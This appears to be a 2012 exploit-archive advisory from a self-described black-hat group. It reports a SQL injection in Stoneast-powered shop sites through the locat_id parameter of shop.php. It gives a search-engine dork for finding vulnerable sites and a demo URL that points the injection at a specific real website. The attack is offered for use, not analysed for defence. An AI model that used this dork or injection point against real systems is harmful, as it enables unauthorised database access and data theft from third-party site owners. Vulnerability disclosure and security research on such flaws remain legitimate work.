Sites powered by Stoneast suffer from a remote SQL injection vulnerability. Note that this finding houses site-specific data.
fcb9049bb0be6dc14b6d0be1d5698d8cd3d24bbc7d027d589fba10bef8c93e78
################################################################
----------------------------------------------------------------
Stoneast SQL Injection Vulnerability
----------------------------------------------------------------
################################################################
# Exploit Title : Stoneast SQL Injection Vulnerability
# Author : Hack Center Security Team
# Discovered By : Net.W0lf
# Software Link : [ www.stoneast.com ]
# Date : 9/25/2012
# E-Mail : Bl4ck.Intell@gmail.com & Net-W0lf@att.net
# DorK : " Powered by Stoneast "
################################################################
----------------------------------------------------------------
+-----------------------+
| SQL Injection |
+-----------------------+
Expl0!T :
[TaRgeT]/shop.php?locat_id=[SQl]
D3m0:
www.gotosaikung.com/php/shop/shop.php?locat_id='
GreetZ To :
| Am!r | B3HZ4D | And All Iranian Black Hat HackerZ
Hack-Center
===========================================# End #=============================================